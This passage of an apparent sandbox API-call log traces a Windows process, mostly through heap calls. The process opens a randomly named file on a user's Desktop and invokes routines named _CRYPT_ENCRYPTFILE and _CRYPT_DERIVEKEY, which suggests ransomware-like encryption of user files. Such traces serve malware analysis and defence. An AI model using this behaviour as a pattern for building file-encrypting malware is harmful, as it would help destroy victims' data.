hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.708] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0129.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf70 [0129.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caf70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0129.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.708] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0129.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0129.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0129.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0129.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0129.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0129.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0129.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0129.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0129.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0129.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0129.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0129.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0129.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5N nlGCuCJHLr.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\5n nlgcucjhlr.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0129.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0129.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0129.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0129.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0129.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0129.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0129.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0129.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0129.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0129.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0129.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0129.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0129.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0129.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0129.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0129.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0129.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0129.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0129.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0129.716] FreeLibrary (hLibModule=0x772d0000) returned 1 [0129.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0129.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.718] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0129.718] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.719] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0129.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391fc0 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0129.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca9e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0129.721] CloseHandle (hObject=0x258) returned 1 [0129.721] FreeLibrary (hLibModule=0x772d0000) returned 1 [0129.721] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0129.721] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\5N nlGCuCJHLr.gif", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4d3d00, ftCreationTime.dwHighDateTime=0x1d5efef, ftLastAccessTime.dwLowDateTime=0x634a8dc0, ftLastAccessTime.dwHighDateTime=0x1d5e5fb, ftLastWriteTime.dwLowDateTime=0x634a8dc0, ftLastWriteTime.dwHighDateTime=0x1d5e5fb, nFileSizeHigh=0x0, nFileSizeLow=0xf43e, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="5N nlGCuCJHLr.gif", cAlternateFileName="5NNLGC~1.GIF")) returned 0x41ac100 [0129.722] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0129.722] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0129.722] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.722] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0129.722] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0129.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0129.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0129.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0129.722] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0129.723] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0129.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0129.760] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0129.760] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0129.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0129.760] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.761] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0129.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cafd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0129.761] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0129.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 